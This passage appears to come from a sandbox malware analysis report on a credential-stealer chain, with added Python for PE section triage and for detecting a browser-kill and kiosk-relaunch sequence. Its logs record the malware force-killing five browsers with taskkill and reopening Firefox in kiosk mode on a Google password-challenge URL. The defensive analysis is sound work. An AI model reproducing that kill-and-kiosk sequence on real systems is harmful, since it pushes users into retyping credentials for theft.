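    headers_size = pe_off + 4 + 20 + size_opt + num * 40
    raw_ptr = (headers_size + 0x1FF) & ~0x1FF          # first raw section at the next 512-byte boundary
    dos = bytearray(pe_off)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, pe_off)
    coff = struct.pack("<HHIIIHH", 0x14C, num, 0, 0, 0, size_opt, 0x102)   # i386, EXECUTABLE_IMAGE|32BIT_MACHINE
    img = bytearray(dos + b"PE\0\0" + coff + bytes(size_opt))
    bodies = bytearray()
    for i, (name, chars, data) in enumerate(sections):
        img += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), 0x1000 * (i + 1),
                           len(data), raw_ptr + len(bodies), 0, 0, 0, 0, chars)
        bodies += data
    img += bytes(raw_ptr - len(img))
    return bytes(img + bodies)


_rng = random.Random(1540733)
_noise = lambda n: bytes(_rng.getrandbits(8) for _ in range(n))   # stands in for packed payload bytes
SAMPLE = build_sample([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b"\x90" * 4096),
    (b"iropgfss", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, _noise(8192)),
    (b"\x01\x02\x03", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, _noise(4096)),
    (b".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ, b"\x00" * 2048),
])

if __name__ == "__main__":
    for label, reason in triage(SAMPLE):
        print(f"{label:14} {reason}")
```

None of the three traits is conclusive alone (resource-heavy installers also have incompressible sections), but the combination of a writable .text, an unprintable or random section name and a near-1.0 ratio on the same file matches every dropped executable listed above, which is why the report scores them together.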
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000003.1600676886.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1688670034.0000000000471000.00000040.00000001.01000000.00000007.sdmp, bd214fbd32.exe, 0000000E.00000003.1883606041.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, bd214fbd32.exe, 0000000E.00000002.1923946896.0000000000051000.00000040.00000001.01000000.00000010.sdmp, num.exe, 00000026.00000002.2204943737.000000000037E000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@73/21@82/12
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\36DBWZHB.htm
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4796:64:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.1446054552.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431607934.00000000059B7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1446144282.00000000059C1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1432027531.0000000005999000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431730417.000000000599A000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999933119.00000000059B9000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999097778.00000000059D6000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2023781336.00000000059CA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1999413840.00000000059BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe Virustotal: Detection: 52%
Source: G4X9C8XP66LPZY0PX2HHB5N.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: J2IWSCR5FJAMGGW2VC4ET4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe "C:\Users\user~1\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe "C:\Users\user~1\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe "C:\Users\user~1\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe"
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe "C:\Users\user~1\AppData\Local\Temp\1001091001\bd214fbd32.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe "C:\Users\user~1\AppData\Local\Temp\1001092001\136916b3ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe"
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe "C:\Users\user~1\AppData\Local\Temp\1001093001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c059e01-df08-4ea7-99e7-8e52a0f774f0} 6000 "\\.\pipe\gecko-crash-server-pipe.6000" 1c95726dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4580 -parentBuildID 20230927232528 -prefsHandle 4572 -prefMapHandle 4480 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d66d859a-061e-466f-93a3-e7567ce2edce} 6000 "\\.\pipe\gecko-crash-server-pipe.6000" 1c968370810 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe "C:\Users\user~1\AppData\Local\Temp\1001091001\bd214fbd32.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe "C:\Users\user~1\AppData\Local\Temp\1001092001\136916b3ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe "C:\Users\user~1\AppData\Local\Temp\1001093001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe "C:\Users\user~1\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe "C:\Users\user~1\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe "C:\Users\user~1\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe "C:\Users\user~1\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe "C:\Users\user~1\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe "C:\Users\user~1\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe"
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe "C:\Users\user~1\AppData\Local\Temp\1001091001\bd214fbd32.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe "C:\Users\user~1\AppData\Local\Temp\1001092001\136916b3ff.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe "C:\Users\user~1\AppData\Local\Temp\1001093001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe "C:\Users\user~1\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe "C:\Users\user~1\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe"
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2288 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6c059e01-df08-4ea7-99e7-8e52a0f774f0} 6000 "\\.\pipe\gecko-crash-server-pipe.6000" 1c95726dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4580 -parentBuildID 20230927232528 -prefsHandle 4572 -prefMapHandle 4480 -prefsLen 26317 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d66d859a-061e-466f-93a3-e7567ce2edce} 6000 "\\.\pipe\gecko-crash-server-pipe.6000" 1c968370810 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process created: unknown unknown
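The process tree above shows the sequence worth alerting on: a stage dropped by skotes.exe into AppData\Local\Temp force-kills every major browser (taskkill /F /IM ... /T for firefox, chrome, msedge, opera and brave) and then relaunches Firefox in --kiosk mode on a URL that lands on the Google sign-in challenge, so the user is pushed to retype credentials into a browser whose stores the stealer components read. The WMI Win32_Process queries and conhost children attributed to taskkill.exe are taskkill's own enumeration and console host and carry no signal by themselves; the indicator is the parent image, the argument pattern and the order. The detector below is an added example, not sandbox or malware code: its event records are constructed from the Process created lines above, and the (parent image, image, command line) layout, the three-kill threshold and the login-URL pattern are assumptions a practitioner would tune to their own telemetry (Sysmon event 1 or Security 4688 with command-line logging).

```python
"""Detect the browser-kill / kiosk-relaunch sequence from a process-creation log.
Added example; not sandbox or malware code. EVENTS is constructed from the
report's Process created lines; the record layout is an assumption."""
import re
from collections import defaultdict

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "opera.exe", "brave.exe"}
KILL_RE = re.compile(r"taskkill(?:\.exe)?\b.*?/IM\s+(\S+)", re.IGNORECASE)
LOGIN_RE = re.compile(r"accounts\.google\.com|/signin|/login", re.IGNORECASE)   # assumed login-page pattern
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)

STAGER = r"C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
KIOSK_URL = "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd"

# (parent image, image, command line); constructed from the report's process tree
EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe", STAGER, f'"{STAGER}"'),
    (STAGER, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM firefox.exe /T"),
    (STAGER, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM chrome.exe /T"),
    (STAGER, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM msedge.exe /T"),
    (STAGER, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM opera.exe /T"),
    (STAGER, r"C:\Windows\SysWOW64\taskkill.exe", "taskkill /F /IM brave.exe /T"),
    (STAGER, FIREFOX, f'"{FIREFOX}" --kiosk "{KIOSK_URL}" --no-default-browser-check --disable-popup-blocking'),
    # constructed benign control: a logoff script closing one browser with no relaunch
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\taskkill.exe", "taskkill /F /IM chrome.exe"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def kiosk_url(cmdline: str) -> str:
    """First http(s) token of the command line, quotes stripped; '' if none."""
    for tok in cmdline.split():
        tok = tok.strip('"')
        if tok.lower().startswith(("http://", "https://")):
            return tok
    return ""


def detect(events, min_kills: int = 3):
    """One finding per parent that force-killed >= min_kills browsers and then
    launched a browser in kiosk mode on a login URL."""
    kills = defaultdict(set)          # parent image -> browsers it has force-killed so far
    findings = []
    for parent, image, cmdline in events:
        base = basename(image)
        if base == "taskkill.exe":
            m = KILL_RE.search(cmdline)
            if m and m.group(1).lower() in BROWSERS:
                kills[parent].add(m.group(1).lower())
        elif base in BROWSERS and "--kiosk" in cmdline.lower():
            url = kiosk_url(cmdline)
            killed = kills.get(parent, set())
            if len(killed) >= min_kills and LOGIN_RE.search(url):
                findings.append({
                    "parent": parent,
                    "parent_in_temp": bool(TEMP_RE.search(parent)),   # dropped stage, not an installed app
                    "killed": sorted(killed),
                    "kiosk_browser": base,
                    "kiosk_url": url,
                })
    return findings


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

Keying on the parent rather than on taskkill.exe alone keeps the single benign kill in the control record from firing; in production the same grouping should use the parent PID and a time window, and the kiosk check should also cover chrome.exe/msedge.exe --kiosk since the technique is not tied to Firefox.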
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
